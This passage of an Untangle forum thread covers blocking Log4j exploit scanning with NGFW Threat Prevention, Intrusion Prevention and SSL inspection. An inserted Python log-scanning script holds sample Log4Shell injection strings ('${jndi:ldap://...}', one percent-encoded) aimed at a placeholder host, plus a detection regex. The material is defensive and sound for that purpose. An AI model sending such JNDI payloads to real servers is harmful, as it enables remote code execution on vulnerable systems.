  1. #41
    Untanglit
    Join Date
    Dec 2020
    Posts
    23

    This is what my Nessus scan of NGFW looks like, no CVE-2021-44228, but...

    Nessus Scan.png

  2. #42
    Untangle Ninja
    WebFooL's Avatar
    Join Date
    Jan 2009
    Location
    Sweden (Eskilstuna)
    Posts
    5,049

    Quote Originally Posted by dashpuppy View Post
    You use TP? Every time I enable that software on my Untangle units "$hit hits the fan". A lot of things break and stop working! The advice from a member on here was to disable it and move on with life and not use it. Maybe I just need to learn it more and figure out how to enable things and make a lot of exceptions... :O
    We had issues with it in the beginning and a few tickets every month when some cloud platform gets their IP in the high risk category.

    But on the whole it does more good than damage at the moment.

  3. #43
    Master Untangler
    Join Date
    Jul 2010
    Location
    Nanaimo B.C
    Posts
    874

    Quote Originally Posted by WebFooL View Post
    We had issues with it in the beginning and a few tickets every month when some cloud platform gets their IP in the high risk category.

    But on the whole it does more good than damage at the moment.
    I just have to make a lot of exceptions is all! Like YouTube? Or my Aruba Portal was blocked, etc.
    Started Youtube Channel, Have a question about Untangle Ask me : jason @ jasonslab.ca
    https://www.youtube.com/c/jasonslabvideos << Please like and subscribe, helps me out !!

  4. #44
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,510

    Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.

    Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  5. #45
    Master Untangler
    Join Date
    Jul 2010
    Location
    Nanaimo B.C
    Posts
    874

    Quote Originally Posted by sky-knight View Post
    Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.

    Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
    I'd ask you to share an example / screenshot, but you would probably submit another @hole response like the one in the direct PM.
    Started Youtube Channel, Have a question about Untangle Ask me : jason @ jasonslab.ca
    https://www.youtube.com/c/jasonslabvideos << Please like and subscribe, helps me out !!

  6. #46
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,510

    Quote Originally Posted by dashpuppy View Post
    I'd ask you to share an example / screenshot, but you would probably submit another @hole response like the one in the direct PM.
    Was that before or after you spammed me twice with a request that I go into more detail about which I was quite clear once already?

    Oh... and for FREE I might add. I have kids to feed, I get PAID for professional tech support.

    You were quite rude, I responded bluntly but appropriately. And now you come here to air dirty laundry in public? How classy!

    Seriously, and all over a 1 line rule?

    It seems to me that you want to use my knowledge and experience for your own gain, but only when I give it away in tiny personalized bite sized pieces for free. You want more for free, go read the wiki. It has all you need to answer both questions, in less than 1 paragraph.
    Last edited by sky-knight; 12-17-2021 at 01:40 PM.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  7. #47
    Untangler jcoffin's Avatar
    Join Date
    Aug 2008
    Location
    Lake Tahoe
    Posts
    9,710

    Be nice folks. It's the holidays for goodwill to all people.
    Attention: Support and help on the Untangle Forums is provided by
    volunteers and community members like yourself.
    If you need Untangle support please call or email support@untangle.com

  8. #48
    Untangler
    Join Date
    May 2016
    Posts
    51

    Quote Originally Posted by sky-knight View Post
    Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.

    Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
    I must be doing something wrong. I have Intrusion Prevention set to block the 46 signatures that contain log4j, yet I see nothing getting blocked. When I look at my modsecurity logs I still see a lot of the jndi:ldap:// type of requests. It's like it's skipping right past Intrusion Prevention.

    EDIT: Ok, realized it's Threat Prevention people are speaking of, but still can't get it. For example, I did a rule to block URI is jndi. However, that went right through on a test.
    Last edited by sspeed; 12-17-2021 at 02:59 PM.

  9. #49
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,510

    Quote Originally Posted by sspeed View Post
    I must be doing something wrong. I have Intrusion Prevention set to block the 46 signatures that contain log4j, yet I see nothing getting blocked. When I look at my modsecurity logs I still see a lot of the jndi:ldap:// type of requests. It's like it's skipping right past Intrusion Prevention.

    EDIT: Ok, realized it's Threat Prevention people are speaking of, but still can't get it. For example, I did a rule to block URI is jndi. However, that went right through on a test.
    No, you have Intrusion Prevention configured correctly if you have those rules set to block. The problem is the module will never see the URI field because all the traffic is encrypted. You have to use SSL inspector to terminate the SSL inbound on Untangle, and then forward on the traffic to the web server. This reality is a bit cumbersome to deal with on NGFW, which is why Untangle has a new Web Application Firewall product.

    That being said, I recommend use of Policy Manager to direct all ingress web traffic on NGFW to its own policy, from there you can install a curated list of modules. Threat Prevention in this policy is a risk... you WILL have to keep a close eye on it. However, if you deploy Threat Prevention in such a way that it's responsible for ingress web traffic, it will control traffic based on the reputations of the IPs in question. The addresses that are abusing our web servers with these exploit attempts are largely crap, so Threat Prevention behaves accordingly. This in turn cleans up your web access logs.

    I'm using it on my public website, as well as my RMM currently. It's not great at times because the locations my agents are checking in from often also have terrible reputations. For these locations I use IP address in a policy rule to push the traffic to yet another policy that doesn't have Threat Prevention. Basically I have a single policy rule that has a growing list of IP addresses in it. Occasionally I just delete them all and start over.

    P.S. If you decide to use Threat Prevention on your own web content, there's a check box under its advanced tab you're going to want to enable.
    Last edited by sky-knight; 12-17-2021 at 03:21 PM.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com
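
An added example, not written by any poster in this thread and not Untangle code: posts #48 and #49 describe the jndi:ldap:// requests still showing up in the web server's own logs, because that is where TLS has already been terminated. This Python script reads such a log, percent-decodes each field, and lists the client IPs that sent a JNDI lookup string. It assumes Apache/nginx "combined" log format; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in "combined" log format. Addresses come from
# documentation ranges and the host name is a placeholder.
SAMPLE_LOG = r'''
198.51.100.7 - - [17/Dec/2021:14:02:11 +0000] "GET /?q=${jndi:ldap://callback.example.invalid/a} HTTP/1.1" 404 153 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid/b}"
203.0.113.20 - - [17/Dec/2021:14:05:40 +0000] "GET /login?next=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fc%7D HTTP/1.1" 302 0 "-" "curl/7.79.1"
192.0.2.44 - - [17/Dec/2021:14:06:02 +0000] "GET /docs/jndi-overview.html HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Match the lookup syntax, not the bare word "jndi", so ordinary paths
# that merely contain the word are not flagged.
JNDI_RE = re.compile(r'\$\{\s*jndi:', re.IGNORECASE)


def fully_unquote(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return {client_ip: [log fields that carried a JNDI lookup string]}."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or non-combined-format line
        for field in ("request", "referer", "agent"):
            if JNDI_RE.search(fully_unquote(m.group(field))):
                hits.setdefault(m.group("ip"), []).append(field)
    return hits


if __name__ == "__main__":
    for ip, fields in scan(SAMPLE_LOG).items():
        print(ip, ",".join(fields))
```

The request from 192.0.2.44 is left out because its path only contains the word "jndi", which a plain substring rule would have flagged.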

  10. #50
    Untanglit
    Join Date
    May 2020
    Location
    Canada
    Posts
    15

    Quote Originally Posted by dashpuppy View Post
    I'd ask you to share an example / screenshot...
    I think this is the way: at 28:40 change the rule to Log4j
    https://www.youtube.com/watch?v=o36ep-u-Ayo
